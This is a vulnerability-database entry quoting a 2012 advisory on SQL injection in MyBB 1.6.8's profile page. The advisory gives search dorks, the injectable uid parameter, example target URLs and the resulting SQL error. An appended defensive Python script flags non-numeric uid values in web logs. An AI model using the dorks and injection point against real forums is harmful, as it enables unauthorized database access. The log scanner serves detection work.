MyBB 1.6.8 SQL Injection

Vulnerability ID 1047345 Vulnerability type
Published 2012-06-06 Updated 2012-06-06
CVE ID N/A CNNVD-ID N/A
Platform N/A CVSS score N/A
|Source
https://cxsecurity.com/issue/WLB-2012060058
|Vulnerability details
Vulnerability details have not yet been disclosed
|Exploit
-------------------- IN The NAme OF God --------------------


-====MyBB 1.6.8 Sql Injection Vulnerability====-

# Exploit Title: MyBB 1.6.8 Sql Injection Vulnerability
# Exploit Author: Mr.XpR
# Tested on: BackTrack
# Script Site : http://mybb.com
# MAil : No0PM[at]yahoo[dot]com

-====Dork====-

inurl:member.php?action=profile&uid=

inurl:action=profile&uid=27

-====Exploit====-

http://www.Site.com/forums/member.php?action=profile&uid=[Sqli]

-====Example====-

http://www.mihxxnhack.com/forums/member.php?action=profile&uid=9

http://www.mihxxhack.com/forums/member.php?action=profile&uid=9'


-====information====-

MyBB has experienced an internal SQL error and cannot continue.

SQL Error:
    1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0'' at line 1
Query:
    SELECT * FROM mybb_adv_ratings WHERE fuid='9'' AND uid='0' 

-====Tnx To====-

Just Persian Gulf ~~~~ > W3 Are Persian Hackerz

MMT- Syamak Black - Samim.s - FarbodEZRaeL - Inj3Ctor - UnknowN 

Yaghi.Vahshi - HELLBOY - IrIsT - Black King - Monfared - Sokote_Vahshat ...

And All IraNHAck Security Team Members

iranhack.org
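
The SQL error quoted above shows the uid value reaching the query unescaped once it is no longer a plain integer. As an added example (not part of the original advisory or of MyBB's code), the following script scans web access logs for profile requests whose uid is not purely numeric. The log lines, IP addresses and function name are constructed for illustration and assume the common/combined access-log format.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines; IP addresses are documentation placeholders.
SAMPLE_LOG = """\
192.0.2.10 - - [06/Jun/2012:10:00:01 +0000] "GET /forums/member.php?action=profile&uid=9 HTTP/1.1" 200 5120
192.0.2.44 - - [06/Jun/2012:10:00:07 +0000] "GET /forums/member.php?action=profile&uid=9' HTTP/1.1" 200 812
192.0.2.44 - - [06/Jun/2012:10:00:09 +0000] "GET /forums/member.php?action=profile&uid=9%27 HTTP/1.1" 200 812
192.0.2.10 - - [06/Jun/2012:10:00:15 +0000] "GET /forums/member.php?action=login HTTP/1.1" 200 2048
192.0.2.51 - - [06/Jun/2012:10:00:20 +0000] "GET /forums/showthread.php?tid=3&uid=x HTTP/1.1" 200 900
"""

# Client address and request target from a common/combined-format log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_profile_requests(log_text):
    """Return (client_ip, decoded_uid) for member.php profile requests
    whose uid parameter is anything other than ASCII digits."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/member.php"):
            continue
        # parse_qs percent-decodes values, so uid=9%27 and uid=9' compare equal.
        params = parse_qs(url.query, keep_blank_values=True)
        if params.get("action") != ["profile"]:
            continue
        for uid in params.get("uid", []):
            if not (uid.isascii() and uid.isdigit()):
                hits.append((client, uid))
    return hits


if __name__ == "__main__":
    for client, uid in suspicious_profile_requests(SAMPLE_LOG):
        print(f"{client} sent non-numeric uid: {uid!r}")
```

The same integer-only rule is the input check the application side needs before uid is placed in a query.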